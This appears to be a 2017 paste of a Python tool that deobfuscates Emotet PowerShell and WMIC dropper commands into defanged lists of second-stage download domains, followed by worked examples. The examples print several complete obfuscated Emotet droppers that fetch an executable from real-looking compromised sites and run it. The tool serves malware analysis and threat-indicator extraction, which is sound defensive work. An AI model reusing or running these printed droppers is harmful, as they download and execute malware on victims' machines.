Emotet Deobfuscator

Sep 25th, 2017
  1. import re
  2. import sys
  3.  
  4.  
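def main_menu():
    """Show the top-level menu and run the decoder the user picks.

    Re-prompts in a loop on an invalid choice; the original recursed into
    itself, so a long run of bad input could exhaust the recursion limit.
    """
    # Dispatch table: menu key -> decoder for that obfuscation format
    actions = {
        "1": wmic_format,
        "2": new_format,
        "3": old_format,
    }
    while True:
        print ("1. WMIC Format \n2. PowerShell Format\n3. Array Format\n")
        menu = raw_input("Enter Choice [1-3] : ")
        action = actions.get(menu)
        if action is not None:
            action()
            return
        print ("Invalid Choice")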
  19.  
  20.  
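def wmic_format():
    """Decode the WMIC/PowerShell variant that hides URLs behind [char] junk tokens.

    The pasted command is only ever handled as text (raw_input, string
    replacement, regex) and is never evaluated. The result is defanged
    before display: ``.`` becomes ``[.]`` and ``http://`` is dropped, so the
    recovered domains can be shared as indicators without being clickable.
    """
    a = raw_input("Enter the WMIC command\n")
    # Normalise every "[...char...]" cast to a bare "[char]" so the digits in
    # the cast itself are not mistaken for character codes (raw string: the
    # regex escapes are not valid Python string escapes)
    wmic = re.sub(r"\[.*?char.*?\]", "[char]", a, flags=re.I)
    # Every remaining number is a candidate character code
    wmic = re.findall(r"\d+", wmic)
    # Keep only codes from 30 to 126 inclusive (below the DEL character);
    # the 3-character junk tokens are spelled from consecutive codes in this range
    wmic = [i for i in wmic if 30 <= int(i) < 127]
    # Drop the quote and string-concatenation noise
    a = a.replace("'", "").replace("+", "")
    # Two passes: removing one token can bring another token's characters together
    result = remove_chars(a, wmic)
    result = remove_chars(result, wmic).replace(".", "[.]").replace("http://", "")
    # Piece 6 of the "="-split string currently holds the URL list; fall back to
    # the last piece instead of raising IndexError when the command has fewer pieces
    temp_result = result.split("=")
    x = min(6, len(temp_result) - 1)
    print(temp_result[x])
    # Let the user pick a different piece if this one is not the domain list
    x = array_select(temp_result, x)
    print(temp_result[int(x)])
    # Remove any leftover junk tokens by hand and print the domains
    extra_chars(result, x)
    # Offer to restart for another sample
    menu_end()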
  46.  
  47.  
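def new_format():
    """Decode the PowerShell variant whose script is a list of character codes.

    Every run of digits in the pasted text is taken as a character code and
    mapped back to its character; the joined text is defanged (``.`` becomes
    ``[.]``, ``http://`` is dropped) and split on ``'`` so the quoted URL
    list stands on its own. The decoded script is printed, never executed.
    """
    a = raw_input("Enter the numbers/characters from 36 to 125\n")
    # Raw string: "\d" is a regex escape, not a Python string escape
    codes = re.findall(r"\d+", a)
    decoded = ''.join(chr(int(code)) for code in codes)
    pieces = decoded.replace(".", "[.]").replace("http://", "").split("'")
    # The full list is shown; the URL list is the second element when the
    # decoded script quotes it with '
    print(pieces)
    # Offer to restart for another sample
    menu_end()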
  59.  
  60.  
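def old_format():
    """Decode the array variant: quoted character blocks plus an index sequence.

    The first prompt takes the ``'a','b',...`` block list, the second the
    ``{n}{m}...`` output sequence. Blocks are written to stdout in sequence
    order with quotes removed and dots defanged as ``[.]``.
    """
    a = raw_input("Enter the Character Values\n").replace("','", ";").split(";")
    b = raw_input("Enter the Integer Array Output Sequence\n").split("{")
    # b[0] is whatever precedes the first "{" and is not an index; strip the
    # closing brace from the real indices
    indices = [piece.replace('}', '') for piece in b[1:]]
    # Each index selects one block; the pieces are concatenated on stdout
    for piece in indices:
        c = int(piece)
        sys.stdout.write(a[c].replace("'", "").replace(".", "[.]"))
    # Offer to restart for another sample
    menu_end()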
  76.  
  77.  
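def remove_chars(a, wmic):
    """Strip every 3-character junk token from *a* and return the result.

    *wmic* is the ordered list of character codes (as strings) found in the
    obfuscated command; each window of three consecutive codes spells one
    junk token. Tokens are removed in order from the progressively shortened
    string, which is why the caller runs this twice: a removal can bring the
    characters of another token together. With fewer than three codes *a*
    is returned unchanged.
    """
    for first, second, third in zip(wmic, wmic[1:], wmic[2:]):
        token = chr(int(first)) + chr(int(second)) + chr(int(third))
        a = a.replace(token, '')
    return a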
  88.  
  89.  
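def extra_chars(result, x):
    """Interactively strip leftover junk tokens, then print the domain list.

    Not every junk token is built from ``[char]`` values, so the user may
    type a remaining token by hand; it is removed from *result* and piece
    *x* of the ``=``-split string is shown again. On ``n`` that piece is
    split on ``?`` (the separator between URLs) and printed one domain per
    line. Loops instead of recursing so many rounds of input cannot hit the
    recursion limit.
    """
    while True:
        b = raw_input("Are there any more 3 character strings to replace? (y/n)\n").lower()
        if b.startswith('y'):
            # No validation on the typed token, as before; an empty token is a no-op
            c = raw_input("Enter the characters to replace\n")
            result = result.replace(c, '').replace("http://", "")
            print(result.split("=")[x])
        elif b.startswith('n'):
            printed_results = result.split("=")[x].split("?")
            print("\n".join(printed_results))
            return
        else:
            print ("Invalid Choice")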
  108.  
  109.  
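def array_select(temp_result, x):
    """Let the user confirm or change which ``=``-split piece holds the domains.

    Emotet has moved the URL list between pieces (10, then 6), so the
    caller's index *x* is only a guess. Returns the confirmed 0-based index
    into *temp_result* as an int: *x* itself when the first answer is ``y``,
    otherwise the piece the user picks from the numbered listing. The
    original returned True on ``y`` (indexing piece 1, not *x*) and dropped
    the result of its recursive calls (returning None); both are fixed here,
    and invalid answers or out-of-range piece numbers simply re-prompt.
    """
    answer = raw_input("Does this array display the domains? (y/n)\n").lower()
    while True:
        if answer.startswith('y'):
            return x
        if answer.startswith('n'):
            # List every piece with a 1-based number for the user to choose from
            for m, piece in enumerate(temp_result, 1):
                print("%d %s" % (m, piece))
            b = raw_input("What piece of the Array contains the URLs?\n")
            try:
                candidate = int(b) - 1
                # Reject negative numbers too; Python would silently index from the end
                if not 0 <= candidate < len(temp_result):
                    raise IndexError(candidate)
                print(temp_result[candidate])
            except (IndexError, ValueError):
                print("Invalid Array")
                # Re-list the pieces without asking the y/n question again
                continue
            x = candidate
        else:
            print ("Invalid Choice")
        answer = raw_input("Does this array display the domains? (y/n)\n").lower()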
  138.  
  139.  
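def menu_end():
    """Offer to restart the main menu; any other key ends the process.

    Uses sys.exit rather than the exit() builtin: exit() is installed by
    the site module and is absent when Python runs with -S.
    """
    e = raw_input("\n\nPress 1 to restart, any other key to quit\n")
    if e == "1":
        main_menu()
    else:
        sys.exit(0)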
  147.  
  148.  
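# Run the main menu only when executed as a script, not when imported
if __name__ == "__main__":
    main_menu()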
  151.  
  152.  
  153.  
  154.  
  155.  
  156.  
  157. ------------------------------------------------------------------------------
  158. An example of how this script works using the new wmic format
  159.  
  160. 1. WMIC Format
  161. 2. PowerShell Format
  162. 3. Array Format
  163.  
  164. Enter Choice [1-3] : 1
  165. Enter the WMIC command
  166. cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %CpPrlXwPi%=p^o^w^er&&set %ihOoOEWWJO%=^sh^ell&&!%CpPrlXwPi%!!%ihOoOEWWJO%! " (('iNvoK'+'e-ExprESsION (((sRI .sRI+sRI ((Get-VARIable KRh*MDR*KRh).name[3'+',11,2]-joInKsRI+sRIRhKRhsRI+sRI)( ((KR'+'sRI+sRIh& ( M3gENV:cOMSsRI+sRIPEC[4,26,25]-joINh'+'0Eh0E)sRI+sRI ( (hsRI+sRI0EDHyh0E+h0KRh+KRhEnsadasRI+sRIsh0E+h0Ed = &h0E+h0E(h0E'+'+h0ERujKRh+KRhnRuh0E+h0Ej+h0E+h0ERuh0E+hKRh+KRh0Ejh0E+h0Eeh0E+h0ERh0E+'+'h0Euj+Ru'+'jh0E+h0KRh+sRI+sRIKRhEw-objh0E'+'+KRh+'+'KRhh0Eeh0E+h0EcRuj+RujtRh0E+h0Euj) randomsRI'+'+sRI;DHyYYU = h0E+h0E.(RujneRuj+RujwRuj+h0E+h0ERuh0E+h0Ej-objectRh0EsRI+sRI+h0Eu'+'j) S'+'yh0E+h0Estem.Net.WebClieh0'+'E+h0Ent;DHyNSB = DHyh0E+h'+'0Ensad'+'h0E'+'+h0KRh+KRhEasdKRh+K'+'Rh.nextKRh+KRh(10000'+', '+'2821sRI+sRI'+'3'+'3);DHyADCX = Ru'+'j sRI+sRI htsRI+sRItp://tesh0E+h0Eth0E+h0E.magsRI+sRInh0E+h0EusRI+sRImsph0E+h0Eort.com'+'/k1u6dtwh0E+h0sRI+sR'+'IE/?httph0E+h0E:h0E+h0E//wwwh0'+'E'+'+hKRh+KRh0E.sbkh0E+h0Etraveh0E+hsRI+sRI0El.com.mysRI+sRI'+'h0E+s'+'RI+sRIh0E/MoGJD/?httph0E+h0E://doh0E+h0Erschdh0E'+'+h0Ei.com/ly4Ivh0E+h0E/'+'h0E+h0E?hsRI+sRI0E+h0Ehtth0E+sRI+sRIh0Ep:'+'//ww'+'w.hopadih0E+sRI+sRIhsRI+sRI0Elida.rosRI+sRI'+'/0LCh0E+sRI+sR'+'Ih0ETG2/h0E+h0E?h0E+h0Ehh0E+sRI+sRIhKRsRI+sRIh'+'+KRh0Ettp:/h0E+h0E/sph0E+h0sRI+sRIEortid.net/02wh0E+h0Edi/Ruj.h0E+h0ESplKRh+KRh'+'i'+'t(Ruj?sRI+sRIRusRI+sRIj);DHh0E+h0EySh0E'+'+h0EDh0E+h0'+'ECh'+'0E+h0'+'E = h0E+h0EDHyenh0E+h0Ev:p'+'ubh0E+h0E'+'lKRh+KRhih0E+h0Ec + Ruh0E+KRh+KRhh0KRh+KRhEjA0h0E+h0EGRuj + DHyNSB + (Rh0E+sRI+sRIh0Euj.sRI+sRIexRusRI+sRIj+Rujeh0E+h0ERuj)h0EsRI'+'+sRI+h0E;h0E+h0KRh+KRhEforeach(hsRI+sRI0E+h0EDHyah0E+h'+'0Esh0sRI+sRIE+KRh+K'+'Rhh0Efc inh0E+h0E 
h0E+h0EDHKRh+sRI+sRIKRhh0E+h0EyADCX)h0E+h0E{'+'trh0E+h0Eyh0E+h0E{DHyYYh0E+h0EU.Nd5DoyP4WnlyP4OasRI+sRIdFIh0E+h0EyP4leNd5(DHh0E+h0Ey'+'ah0EsRI+sRI+h0Esh0E+h0Efc.Nd5Toh0E+h0KsRI+'+'sRIRh+KRhESh0EKRh+KRh+h'+'0EtryPKRh+KRh4iyP4Nh0E+h0Egh0E+h0ENd5(), h0EKRsRI+sRIh+KRh+hsRI+sRI0EDHySDC);&sRI+sRI(RujInvoRuj+RujkRusRI+sRIjh0E+h0E+Ruje-Ih0E+h0Eth0E+h0EemRh0E+h0Eujh0E+hKRh+KRh0E)(DHySDC);brh0E+h'+'sR'+'I+sRI0Eeak;}catch{}}h0KRh+KRhE).replaCE(sRI+sRIh0EsRI+sRINd5h0E,[StrinG][c'+'HAr]34)'+'KRh+KRh.replaCE(h0EA0Gh0E,h0'+'E2oUh0E).replaCE(([cHArsRI+sRI]121'+'+sRI+sRI[cHAr]80+[cHAr]sRI+sRI52),[SKRh+KRhtrinG][cHAr]'+'96).replaCE(([cHAr]68+['+'cHAr]KRh+KR'+'h72+[cHAr]12KRh+KsRI+sRIRh1),[StrinG][cH'+'Ar]36).rep'+'laCE(sRI+sRI([cHAKRh+KRhr]82+[csRI+sRIHAr]'+'117+sRI+sRI[sRI+sRIcsRI+sRIHKRh+KRhAr]106),[StrinG][cHAr]39'+'KRh'+'+KRh) ) KRh) -crEpLAce ([ChAr]104+[ChAr]48+[ChAr]69)'+',[ChAr]39 -'+'crEpLAce ([ChAr]50+[ChAr]111+[ChAr]85),[ChAr]92'+' -REpLAcE([ChArsRI+sRI]77+[ChAr]5'+'1'+'+[ChAr]103),[ChAr]'+'36))sRI) -CrEPlACe ([CHAR]75+[CHA'+'R]82+[CH'+'AR]104),[CHAR]39) )')-crePlaCE([CHaR]115+[CHaR]82+[CHaR]73),[CHaR]39) |&( $PSHOme[4]+$psHome[30]+'x')
  167. Ruj  test[.]magnumsport[.]com/k1u6dtw/?wwwhKRhKR[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?hhKRhKRttp://sportid[.]net/02wdi/Ruj[.]SplKRhKRhit(Ruj?Ruj);DHySDC
  168. Does this array display the domains?
  169. y
  170. Ruj  test[.]magnumsport[.]com/k1u6dtw/?wwwhKRhKR[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?hhKRhKRttp://sportid[.]net/02wdi/Ruj[.]SplKRhKRhit(Ruj?Ruj);DHySDC
  171. Are there any more 3 character strings to replace? (y/n)
  172. y
  173. Enter the characters to replace
  174. Ruj
  175.   test[.]magnumsport[.]com/k1u6dtw/?wwwhKRhKR[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?hhKRhKRttp://sportid[.]net/02wdi/[.]SplKRhKRhit(?);DHySDC
  176. Are there any more 3 character strings to replace? (y/n)
  177. y
  178. Enter the characters to replace
  179. hKR
  180.   test[.]magnumsport[.]com/k1u6dtw/?www[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?sportid[.]net/02wdi/[.]SplKRhit(?);DHySDC
  181. Are there any more 3 character strings to replace? (y/n)
  182. y
  183. Enter the characters to replace
  184. KRh
  185.   test[.]magnumsport[.]com/k1u6dtw/?www[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?sportid[.]net/02wdi/[.]Split(?);DHySDC
  186. Are there any more 3 character strings to replace? (y/n)
  187. n
  188. test[.]magnumsport[.]com/k1u6dtw/
  189. www[.]sbktravel[.]com[.]my/MoGJD/
  190. dorschdi[.]com/ly4Iv/
  191. www[.]hopadilida[.]ro/0LCTG2/
  192. sportid[.]net/02wdi/[.]Split(
  193. );DHySDC
  194.  
  195.  
  196.  
  197. An example of how this script works using the Join format
  198.  
  199. https://www.hybrid-analysis.com/sample/4cfd3f25f178f5ae5dd5c5438a4bc3cd0af2ca712a5a59388612697d4b4424d4?environmentId=100
  200.  
  201. Base64-decoding the command and removing the NUL characters gives this output:
  202.  
  203. & ( $eNv:PubLIc[13]+$eNV:puBLic[5]+'X')( ( '36q119:115~99~114x105z112~116;32z61x32J110q101&119q45z111J98&106x101z99~116G32~45%67%111x109q79q98;106%101:99&116x32x87q83%99z114x105J112:116x46:83x104q101:108x108z59J36G119J101z98z99%108%105&101x110~116J32:61z32~110z101q119;45:111J98x106%101:99%116%32z83G121&115q116%101~109G46G78J101q116~46z87:101~98J67z108~105z101;110q116q59~36x114:97;110;100G111q109x32q61&32z110%101;119J45J111%98J106~101%99&116z32q114x97&110&100%111%109J59G36&117:114~108G115~32%61;32q39~104~116G116z112%58~47~47~98q97J103:112:114&105&110%116~101q114G46z99&111x109;47q105x47q44%104:116;116z112%58G47%47x98;114&111:97J100~97z118:101J110%117J101G46~99&111&109:46G97&117&47:67z82x47G44J104%116q116q112G58J47q47:115z112:121%114q97:108G119:101G98&46:99&111G109J47J105~110&118z97;114q47q110;107;108;79G105J77;47%44:104x116G116~112~58;47J47z102:99;116&100x101;118:46x99z111q109:47&120G98G117G121x88z47q44x104G116x116J112%58x47q47z99;98%111J120z46:100%107G47%118&85J83x106J65%122G86q71J114J47:39&46z83:112z108;105~116&40:39q44J39z41~59z36J110G97J109x101z32q61G32z36;114J97q110:100%111z109:46q110J101z120x116x40q49;44G32:54%53&53z51%54~41~59;36&112%97%116q104~32z61G32q36J101z110G118~58G116:101%109&112%32%43~32G39:92&39q32z43G32G36:110:97&109~101x32q43x32;39&46%101:120G101~39~59~102;111;114G101q97x99G104x40:36~117G114z108z32~105%110q32J36z117%114G108:115x41z123z116J114G121J123q36x119J101G98&99G108J105G101;110~116x46%68~111&119:110q108;111q97z100%70%105x108G101z40~36G117%114;108;46G84J111:83J116%114&105&110x103G40x41&44&32q36G112:97z116~104z41q59~83%116~97&114G116q45G80;114z111;99~101z115q115q32:36&112z97&116x104~59;98J114:101G97%107&59&125:99~97J116x99z104z123G119q114J105%116~101G45x104~111z115J116%32x36J95z46~69%120%99&101z112q116x105z111J110z46;77&101&115x115x97q103z101&59J125z125'-split'z' -SplIT'x' -sPLIT':' -SpLit'J' -sPLiT '&' -sPLIT';' -SplIT'%' -sPLIT '~'-SpLiT'q'-Split'G'|fOREacH-OBjecT {([char][iNT] $_) }) -jOIN '' )
  204.  
  205. Choose option 2 (PowerShell Format, the "new" format) from the menu
  206. Paste from the 36 up to the 125 before the split (do not include the ' ')
  207. The script will provide you with an output of
  208. bagprinter[.]com/i/,broadavenue[.]com[.]au/CR/,spyralweb[.]com/invar/nklOiM/,fctdev[.]com/xbuyX/,cbox[.]dk/vUSjAzVGr/
  209. These are the new second-stage domains for this Emotet sample.
  210.  
  211.  
  212. This second example shows numbers only
  213.  
  214. https://www.hybrid-analysis.com/sample/0c34b872ba2266c2028e27c9fc9bed8fe9c6f04221695e19c5194200a9638d6e?environmentId=100
  215. Base64-decoding the command and removing the NUL characters gives this output:
  216.  
  217. [CHar[]] (36, 119 , 115 , 99, 114, 105, 112,116,32, 61 ,32 , 110, 101 , 119 ,45,111, 98 ,106, 101 ,99 , 116,32 ,45, 67 ,111 , 109 , 79 ,98, 106 , 101 , 99 ,116,32,87,83,99 , 114 , 105 , 112 ,116, 46 ,83 , 104, 101 ,108 , 108 ,59, 36, 119 , 101 , 98, 99,108, 105 , 101 , 110 ,116, 32, 61 , 32, 110, 101,119, 45 ,111,98 ,106, 101 ,99 ,116,32 ,83,121 , 115 , 116 , 101,109 ,46 , 78 , 101 , 116, 46, 87 ,101, 98 ,67 ,108, 105,101, 110,116 , 59,36 ,114, 97 , 110 , 100 , 111,109,32,61, 32, 110,101 ,119 , 45,111 , 98 ,106 ,101 ,99 , 116 , 32,114, 97,110 ,100 ,111 , 109 , 59 , 36,117 , 114 ,108 ,115 ,32 ,61 , 32 ,39,104 , 116 ,116 ,112 ,58,47 ,47 , 103,97 , 109 ,109 , 101 ,108 , 103 ,114, 97, 118, 108, 105 ,110, 103 , 101 , 110, 46 ,99 , 111,109, 47,100 , 108, 84 ,77 ,104,47,44 , 104,116,116 , 112 , 58,47 , 47,97,99,101 , 106 , 97, 112, 97 , 110 , 46 ,110 , 101 ,116 , 47,98, 121 ,103 ,47 , 44 ,104,116 , 116 , 112, 58 , 47 , 47 ,70 , 108 ,111 , 114,105 ,115 ,115 ,97 ,110 , 116 , 70 , 105, 114, 101 ,46,99,111 ,109,47 ,97, 115, 112,110 ,101,116 ,95,99, 108 , 105 , 101 , 110 ,116, 47,71,99,99 ,119, 117, 111 ,102, 47, 44,104 ,116, 116,112 ,58,47,47 , 101,116,101,114 , 110, 97,108 ,97,109 ,111 , 117, 114 ,46, 99 , 111 , 109,47 ,66, 73 , 72,103 , 47,44 ,104, 116 ,116 ,112,58, 47,47,98 ,97,99, 104,117, 101 , 46,99 , 111,46 , 117 , 107 , 47 , 81, 74 ,47, 39,46 , 83, 112 ,108 , 105, 116 , 40,39 , 44 , 39 , 41,59 , 36, 110 ,97 ,109 , 101 ,32 ,61,32, 36 , 114 , 97, 110, 100 , 111 ,109 , 46,110 ,101 ,120 ,116 ,40 ,49, 44, 32,54 , 53, 53 , 51 ,54 ,41 ,59 , 36 ,112 , 97 ,116 ,104 , 32 ,61, 32 ,36,101,110 , 118, 58 ,116 , 101 ,109, 112 , 32 , 43, 32 , 39 , 92 , 39,32,43,32 , 36 ,110, 97 , 109,101 ,32 ,43, 32,39, 46, 101 ,120 ,101, 39 , 59, 102,111 ,114, 101,97 ,99, 104 ,40, 36 ,117, 114 ,108, 32,105 ,110 , 32 ,36, 117 ,114 , 108,115 , 41,123, 116 , 114 , 121 , 123 , 36 ,119 , 101,98 , 99,108 ,105 ,101,110 ,116 ,46 ,68 , 111 , 119 ,110, 108,111,97 , 100 ,70 , 105, 108 ,101 ,40 , 36 ,117 
, 114 , 108 ,46 ,84,111,83 , 116 , 114, 105, 110 , 103 ,40 ,41, 44, 32 ,36,112, 97, 116 , 104 ,41 ,59 , 83 , 116 , 97, 114, 116 ,45,80 ,114,111, 99 , 101 ,115 , 115, 32 ,36,112, 97,116 ,104 , 59,98 , 114 , 101, 97,107 ,59 , 125, 99 ,97 ,116,99 , 104 , 123 ,119, 114 , 105 , 116 ,101 ,45,104,111 , 115 ,116 ,32,36, 95, 46 , 69 ,120 ,99 , 101,112, 116 , 105 ,111 ,110 ,46, 77 , 101 , 115 ,115 ,97 , 103,101, 59, 125, 125) -JoIN''| &( $shelliD[1]+$ShELlid[13]+'x')
  218.  
  219. Choose option 2 (PowerShell Format, the "new" format) from the menu
  220. Paste from the 36 up to the 125 (do not include the enclosing parentheses)
  221. The script will provide you with an output of
  222. gammelgravlingen[.]com/dlTMh/,acejapan[.]net/byg/,FlorissantFire[.]com/aspnet_client/Gccwuof/,eternalamour[.]com/BIHg/,bachue[.]co[.]uk/QJ/
  223. These are the new second-stage domains for this Emotet sample.